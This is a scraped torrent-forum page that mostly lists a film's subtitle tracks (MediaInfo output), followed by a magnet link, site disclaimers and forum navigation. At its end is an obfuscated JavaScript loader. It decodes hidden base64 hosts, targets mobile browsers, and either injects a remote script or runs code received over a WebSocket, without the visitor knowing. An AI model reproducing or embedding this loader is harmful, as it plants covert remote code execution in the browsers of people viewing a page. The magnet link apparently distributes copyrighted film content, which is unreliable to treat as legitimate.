  872. Bit rate : 34 b/s

  873. Count of elements : 921

  874. Stream size : 25.2 KiB (0%)

  875. Title : Norwegian Bokmal

  876. Language : Norwegian Bokmal

  877. Default : No

  878. Forced : No


  879. Text #22

  880. ID : 51

  881. Format : UTF-8

  882. Codec ID : S_TEXT/UTF8

  883. Codec ID/Info : UTF-8 Plain Text

  884. Duration : 1 h 40 min

  885. Bit rate : 35 b/s

  886. Count of elements : 1021

  887. Stream size : 26.2 KiB (0%)

  888. Title : Polish

  889. Language : Polish

  890. Default : No

  891. Forced : No


  892. Text #23

  893. ID : 52

  894. Format : UTF-8

  895. Codec ID : S_TEXT/UTF8

  896. Codec ID/Info : UTF-8 Plain Text

  897. Duration : 1 h 40 min

  898. Bit rate : 37 b/s

  899. Count of elements : 999

  900. Stream size : 27.3 KiB (0%)

  901. Title : Portuguese

  902. Language : Portuguese

  903. Default : No

  904. Forced : No


  905. Text #24

  906. ID : 53

  907. Format : UTF-8

  908. Codec ID : S_TEXT/UTF8

  909. Codec ID/Info : UTF-8 Plain Text

  910. Duration : 1 h 40 min

  911. Bit rate : 36 b/s

  912. Count of elements : 1070

  913. Stream size : 26.7 KiB (0%)

  914. Title : Brazilian Portuguese

  915. Language : Portuguese

  916. Default : No

  917. Forced : No


  918. Text #25

  919. ID : 54

  920. Format : UTF-8

  921. Codec ID : S_TEXT/UTF8

  922. Codec ID/Info : UTF-8 Plain Text

  923. Duration : 1 h 40 min

  924. Bit rate : 44 b/s

  925. Count of elements : 1072

  926. Stream size : 32.5 KiB (0%)

  927. Title : Romanian

  928. Language : Romanian

  929. Default : No

  930. Forced : No


  931. Text #26

  932. ID : 55

  933. Format : UTF-8

  934. Codec ID : S_TEXT/UTF8

  935. Codec ID/Info : UTF-8 Plain Text

  936. Duration : 1 h 40 min

  937. Bit rate : 57 b/s

  938. Count of elements : 1064

  939. Stream size : 42.5 KiB (0%)

  940. Title : Russian

  941. Language : Russian

  942. Default : No

  943. Forced : No


  944. Text #27

  945. ID : 56

  946. Format : UTF-8

  947. Codec ID : S_TEXT/UTF8

  948. Codec ID/Info : UTF-8 Plain Text

  949. Duration : 1 h 40 min

  950. Bit rate : 37 b/s

  951. Count of elements : 933

  952. Stream size : 27.5 KiB (0%)

  953. Title : Spanish

  954. Language : Spanish

  955. Default : No

  956. Forced : No


  957. Text #28

  958. ID : 57

  959. Format : UTF-8

  960. Codec ID : S_TEXT/UTF8

  961. Codec ID/Info : UTF-8 Plain Text

  962. Duration : 1 h 40 min

  963. Bit rate : 36 b/s

  964. Count of elements : 1036

  965. Stream size : 26.9 KiB (0%)

  966. Title : European Spanish

  967. Language : Spanish

  968. Default : No

  969. Forced : No


  970. Text #29

  971. ID : 58

  972. Format : UTF-8

  973. Codec ID : S_TEXT/UTF8

  974. Codec ID/Info : UTF-8 Plain Text

  975. Duration : 1 h 40 min

  976. Bit rate : 36 b/s

  977. Count of elements : 950

  978. Stream size : 26.6 KiB (0%)

  979. Title : Swedish

  980. Language : Swedish

  981. Default : No

  982. Forced : No


  983. Text #30

  984. ID : 59

  985. Format : UTF-8

  986. Codec ID : S_TEXT/UTF8

  987. Codec ID/Info : UTF-8 Plain Text

  988. Duration : 1 h 40 min

  989. Bit rate : 99 b/s

  990. Count of elements : 1094

  991. Stream size : 73.2 KiB (0%)

  992. Title : Thai

  993. Language : Thai

  994. Default : No

  995. Forced : No


  996. Text #31

  997. ID : 60

  998. Format : UTF-8

  999. Codec ID : S_TEXT/UTF8

  1000. Codec ID/Info : UTF-8 Plain Text

  1001. Duration : 1 h 40 min

  1002. Bit rate : 35 b/s

  1003. Count of elements : 1084

  1004. Stream size : 26.3 KiB (0%)

  1005. Title : Turkish

  1006. Language : Turkish

  1007. Default : No

  1008. Forced : No


  1009. Text #32

  1010. ID : 61

  1011. Format : UTF-8

  1012. Codec ID : S_TEXT/UTF8

  1013. Codec ID/Info : UTF-8 Plain Text

  1014. Duration : 1 h 40 min

  1015. Bit rate : 59 b/s

  1016. Count of elements : 986

  1017. Stream size : 44.0 KiB (0%)

  1018. Title : Ukrainian

  1019. Language : Ukrainian

  1020. Default : No

  1021. Forced : No


  1022. Text #33

  1023. ID : 62

  1024. Format : UTF-8

  1025. Codec ID : S_TEXT/UTF8

  1026. Codec ID/Info : UTF-8 Plain Text

  1027. Duration : 1 h 40 min

  1028. Bit rate : 49 b/s

  1029. Count of elements : 1019

  1030. Stream size : 36.6 KiB (0%)

  1031. Title : Vietnamese

  1032. Language : Vietnamese

  1033. Default : No

  1034. Forced : No



TAGS 家庭

磁力链:
  • magnet:?xt=urn:btih:590A5AF57C368EB1B34DE5CD77CB67CE71389F42

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x54\x47\x50\x48\x42\x70\x79\x79\x5a\x53']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vanNrZGxmamtkLnhpbbnlhbbnNhYXMuY29tLGh0dHBzOi8vbb2pza2RramZrbbGQuaG9uZ3J1aWt0LmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};